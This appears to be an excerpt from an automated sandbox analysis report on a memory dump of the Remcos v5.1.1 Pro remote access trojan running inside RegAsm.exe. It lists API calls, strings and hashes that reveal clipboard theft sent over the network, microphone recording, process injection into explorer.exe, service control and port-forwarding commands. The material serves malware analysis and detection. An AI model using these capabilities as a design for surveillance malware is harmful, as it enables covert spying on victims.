                            • String ID: 0VG$0VG$<$@$Temp
                            • API String ID: 1704390241-2575729100
                            • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                            • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                            • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                            • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                            APIs
                            • OpenClipboard.USER32 ref: 0041697C
                            • EmptyClipboard.USER32 ref: 0041698A
                            • CloseClipboard.USER32 ref: 00416990
                            • OpenClipboard.USER32 ref: 00416997
                            • GetClipboardData.USER32 ref: 004169A7
                            • GlobalLock.KERNEL32 ref: 004169B0
                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                            • CloseClipboard.USER32 ref: 004169BF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID: !D@
                            • API String ID: 2172192267-604454484
                            • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                            • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                            • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                            • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                            • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                            • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                            • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                            APIs
                            • _free.LIBCMT ref: 100059EA
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100059F6
                            • _free.LIBCMT ref: 10005A01
                            • _free.LIBCMT ref: 10005A0C
                            • _free.LIBCMT ref: 10005A17
                            • _free.LIBCMT ref: 10005A22
                            • _free.LIBCMT ref: 10005A2D
                            • _free.LIBCMT ref: 10005A38
                            • _free.LIBCMT ref: 10005A43
                            • _free.LIBCMT ref: 10005A51
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                            APIs
                            • _free.LIBCMT ref: 004481B5
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 004481C1
                            • _free.LIBCMT ref: 004481CC
                            • _free.LIBCMT ref: 004481D7
                            • _free.LIBCMT ref: 004481E2
                            • _free.LIBCMT ref: 004481ED
                            • _free.LIBCMT ref: 004481F8
                            • _free.LIBCMT ref: 00448203
                            • _free.LIBCMT ref: 0044820E
                            • _free.LIBCMT ref: 0044821C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                            • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                            • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                            • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Eventinet_ntoa
                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                            • API String ID: 3578746661-3604713145
                            • Opcode ID: bd8370f514910b19fded603290f8ef5501d6c574d4c225647a35800570e8c2ef
                            • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                            • Opcode Fuzzy Hash: bd8370f514910b19fded603290f8ef5501d6c574d4c225647a35800570e8c2ef
                            • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                            APIs
                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DecodePointer
                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                            • API String ID: 3527080286-3064271455
                            • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                            • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                            • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                            • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • Sleep.KERNEL32(00000064), ref: 0041755C
                            • DeleteFileW.KERNEL32(00000000), ref: 00417590
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateDeleteExecuteShellSleep
                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                            • API String ID: 1462127192-2001430897
                            • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                            • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                            • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                            • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                            APIs
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                            • API String ID: 2050909247-4242073005
                            • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                            • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                            • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                            • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                            APIs
                            • _strftime.LIBCMT ref: 00401D50
                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                            • API String ID: 3809562944-243156785
                            • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                            • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                            • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                            • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                            • int.LIBCPMT ref: 00410EBC
                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                            • std::_Facet_Register.LIBCPMT ref: 00410EFC
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                            • __Init_thread_footer.LIBCMT ref: 00410F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                            • String ID: ,kG$0kG
                            • API String ID: 3815856325-2015055088
                            • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                            • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                            • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                            • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                            APIs
                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                            • waveInStart.WINMM ref: 00401CFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                            • String ID: dMG$|MG$PG
                            • API String ID: 1356121797-532278878
                            • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                            • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                            • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                            • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                              • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                              • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                              • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                            • TranslateMessage.USER32(?), ref: 0041D57A
                            • DispatchMessageA.USER32 ref: 0041D584
                            • GetMessageA.USER32 ref: 0041D591
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                            • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                            • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                            • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                            • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                            • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                            • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                            • __alloca_probe_16.LIBCMT ref: 00453F6A
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                            • __alloca_probe_16.LIBCMT ref: 00454014
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                            • __freea.LIBCMT ref: 00454083
                            • __freea.LIBCMT ref: 0045408F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 201697637-0
                            • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                            • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                            • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                            • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • _memcmp.LIBVCRUNTIME ref: 004454A4
                            • _free.LIBCMT ref: 00445515
                            • _free.LIBCMT ref: 0044552E
                            • _free.LIBCMT ref: 00445560
                            • _free.LIBCMT ref: 00445569
                            • _free.LIBCMT ref: 00445575
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                            • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                            • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                            • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                            • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                            • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                            • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004018BE
                            • ExitThread.KERNEL32 ref: 004018F6
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: PkG$XMG$NG$NG
                            • API String ID: 1649129571-3151166067
                            • Opcode ID: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                            • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                            • Opcode Fuzzy Hash: d03b4b87c98bc19dde34d1777c040e42b75bf9adce6b93ea1611c5cc13a7821a
                            • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • CloseHandle.KERNEL32(00000000), ref: 00407A88
                            • MoveFileW.KERNEL32 ref: 00407AA5
                            • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                              • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                            • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                            • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                            • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                            APIs
                            • AllocConsole.KERNEL32 ref: 0041CE35
                            • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                            • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$Window$AllocOutputShow
                            • String ID: Remcos v$5.1.1 Pro$CONOUT$
                            • API String ID: 4067487056-3820604032
                            • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                            • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                            • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
